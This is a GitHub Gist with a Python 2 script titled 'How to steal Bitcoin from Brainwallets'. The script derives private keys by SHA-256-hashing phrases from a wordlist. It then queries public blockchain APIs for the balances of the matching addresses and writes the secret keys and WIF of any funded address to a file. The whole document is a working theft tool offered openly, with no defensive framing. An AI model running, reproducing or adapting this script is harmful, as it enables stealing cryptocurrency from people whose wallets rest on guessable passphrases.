Last active
March 15, 2019 08:13
-
-
Save Lanjelin/6e6e4fd1785759f2264e0d198088d81a to your computer and use it in GitHub Desktop.
How to steal Bitcoin from Brainwallets.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib2, hashlib, argparse, sys, time, ast | |
from pycoin import ecdsa, encoding | |
parser = argparse.ArgumentParser(description='How to steal Bitcoin from Brainwallets') | |
parser.add_argument('--s', metavar='\"string\"', help='Check a string.', default=False) | |
parser.add_argument('--f', metavar='<file>', help='Process a wordlist.', default=False) | |
parser.add_argument('--l', metavar='line', help='Line in file to start at.', default=False) | |
args = parser.parse_args() | |
def findKeys(toHash): | |
secretKey = hashlib.sha256(toHash).hexdigest() | |
secret_exponent= int('0x'+secretKey, 0) | |
secretWIF = encoding.secret_exponent_to_wif(secret_exponent, compressed=False) | |
public_pair = ecdsa.public_pair_for_secret_exponent(ecdsa.secp256k1.generator_secp256k1, secret_exponent) | |
hash160c = encoding.hash160_sec_to_bitcoin_address(encoding.public_pair_to_hash160_sec(public_pair, compressed=True)) | |
hash160u = encoding.hash160_sec_to_bitcoin_address(encoding.public_pair_to_hash160_sec(public_pair, compressed=False)) | |
return (secretKey, secretWIF, hash160u, hash160c) | |
def checkBalance(address, source=0): | |
try: | |
if source == 2: | |
#Free: 2000 Requests Per Day - 200 Requests Per Hour - 3 Requests Per Second | |
url = 'https://api.blockcypher.com/v1/btc/main/addrs/' + address + '/balance' | |
req = urllib2.Request(url, headers={ 'User-Agent': 'Mozilla/5.0' }) | |
response = ast.literal_eval(urllib2.urlopen(req).read()).get('balance') | |
else: | |
if source == 1: | |
#Unregistered: 700 Requests Per 5 Minutes - 28800 Requests per 8 Hours - ?? per Second | |
url = 'https://blockchain.info/q/addressbalance/' + address + '?confirmations=3' | |
else: | |
url = 'https://blockexplorer.com/api/addr/'+address+'/balance' | |
req = urllib2.Request(url, headers={ 'User-Agent': 'Mozilla/5.0' }) | |
response = urllib2.urlopen(req).read() | |
except urllib2.HTTPError as e: | |
try: | |
if e.code == 429: | |
print str(e) + ', waiting 15 minutes.' | |
time.sleep(900) | |
response = checkBalance(address) | |
else: | |
raise | |
except: | |
print str(e) + ', waiting 5 seconds.' | |
time.sleep(5) | |
response = checkBalance(address) | |
return response | |
if args.s: | |
keys = findKeys(args.s) | |
#print checkBalance2(keys[2]) | |
val1, val2 = checkBalance(keys[2],2), checkBalance(keys[3],2) | |
print '\nString: ' + args.s | |
print 'Secret: ' + keys[0] | |
print 'WIF: ' + keys[1] + '\n' | |
print 'Balance: ' + '{0:.8f}'.format(float(val1) / 100000000) + ' BTC @ Addr: '+keys[2] | |
print 'Balance: ' + '{0:.8f}'.format(float(val2) / 100000000) + ' BTC @ Addr: '+keys[3] + '\n' | |
if args.f: | |
if args.l: | |
startline = int(args.l) | |
else: | |
startline = 1 | |
with open(args.f) as text: | |
for i in xrange(startline-1): | |
text.next() | |
for code in text: | |
count = 0 | |
code = code.rstrip() | |
keys = findKeys(code) | |
if count <= 10: | |
val1, val2 = checkBalance(keys[2],1), checkBalance(keys[3]) | |
count = 0 | |
else: | |
val1, val2 = checkBalance(keys[2]), checkBalance(keys[3]) | |
count += 1 | |
if ((int(val1)+int(val2)) > 0): | |
print 'Line: ' + str(startline) + ' -- Word: ' + code + ' !! BITCOINS !!' | |
f = open('found_btc.txt', 'a+') | |
f.write('Line: ' + str(startline) + ' -- Word: ' + code + '\n') | |
f.write('Secret: ' + keys[0] + '\n') | |
f.write('WIF: ' + keys[1] + '\n') | |
f.write('Balance: ' + '{0:.8f}'.format(float(val1) / 100000000) + ' BTC @ Addr: '+keys[2] + '\n') | |
f.write('Balance: ' + '{0:.8f}'.format(float(val2) / 100000000) + ' BTC @ Addr: '+keys[3] + '\n\n') | |
f.close() | |
else: | |
print 'Line: ' + str(startline) + ' -- Word: ' + code | |
print 'Balance: ' + '{0:.8f}'.format(float(val1) / 100000000) + ' BTC @ Addr: '+keys[2] | |
print 'Balance: ' + '{0:.8f}'.format(float(val2) / 100000000) + ' BTC @ Addr: '+keys[3] | |
startline += 1 | |
if len(sys.argv)==1: | |
parser.print_help() | |
sys.exit(1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment